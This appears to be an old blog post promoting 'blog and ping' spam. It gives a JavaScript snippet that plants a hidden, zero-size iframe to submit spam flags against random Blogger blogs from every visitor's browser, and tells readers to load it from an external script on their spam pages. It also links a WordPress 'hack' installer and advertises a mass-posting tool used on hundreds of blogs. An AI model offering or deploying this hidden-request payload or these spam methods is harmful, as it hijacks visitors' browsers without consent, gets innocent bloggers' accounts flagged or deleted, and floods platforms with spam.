Are you Blog and Pinging?
Chances are you've heard about blog
and ping techniques by now. If you
haven't, you must have been living
under a rock or something. Heck, even
my grandmother asked me about it the
other day. (OK, not really, but I
hope you get the point. :)
Anyhow, I've had several questions
lately about which blog and ping tecnique
do I use? Well, to be quite honest,
I use wordpress at this point.
Now, I'm sure that there are a lot
of you who are up in arms at this
point saying things like "Blogger
rules and it's so EZ to use."
or "Blogger gets you indexed
faster!". Personally, I think
both of those statements are a load
of crap but - hey - I've always been
quite vocal about my opinions.
Regardless, there is something going
on at blogger. What is it you ask?
Well, they thought it would be a great
idea if they released a new "feature"
to the public. Quite simply, this
feature allows any random person to
come along and "flag" a
blog as objectionable or as spam.
If blogger gets a lot of complaints
about a specific blog then they'll
delete the account.
Gee, isn't that great? As Scott Standke
put it, now you've got a bunch of
"do-gooders" out there making
your life difficult.
Well, you can do one of three things
about this development. The first
is to fight back and put the following
code in a javascript file:
<script language="JavaScript">
<!--
var random_num = Math.round(Math.random()*8999999)+1000000;
document.write('<iframe src="http://www.blogger.com/flag-blog.g?nav=1&toFlag='+random_num+'"
width="0" height="0"
scrolling="no" frameborder="0"></iframe>');
//-->
</script>
Call it from all of your spam pages
by putting this in the <head>
section:
<script language='javascript' src='http://www.baf1.info/fake.js'></script>
What will this do? Well, it keeps
blogger busy because they'll be getting
a lot of random blogs flagged :)
The second thing you could do (assuming
you're still using blogger) is to
go here and setup your blog properly
to avoid the "flag" option
from showing up in your blog.
http://www.blogburner.com/training/video/blogger-setup/1-Blogger-setup.html
I don't, however, recommend using
blogburner as they've had too many
problems in the past.
The final thing you could do is move
to wordpress which is what I did months
ago.
Now, you're probably saying "it's
too difficult to setup wordpress"
and normally I might agree with you.
But, being the nice guy that I am,
I've come out with a way to make your
life a bit simpler.
Go here:
http://www.pduck.com/wphack.zip
Put the install.php in your wp-admin
folder and the wp-config.php goes
in your root wordpress folder. Modify
install.php and change _PASSWORD_
to your password. Modify wp-config.php
and change the database info appropriately.
Now you'll have a wordpress install
that you can setup in a matter of
seconds by going to http://www.yourdomain.com/wp-admin/install.php?step=2
The final thing I've got to say is
if you don't have a way to post to
your blogs, you NEED this program.
It's fantastic. I'm using it on over
900 blogs every few hours and it makes
my life SOOOOOO much easier. Plus
it's made me a ton of money which
is always a bonus.
It comes with a special e-book to
tell you, step by step, how to make
hundreds per DAY only doing blogs.
It's a great addition to your income
stream and I highly recommend it.
Blah blah blah - before I bore you
to death, go check it out. It's called
RSSToBlog and can be found here:
http://www.pduck.com/RSSToBlog
Good luck with all of your spamming.
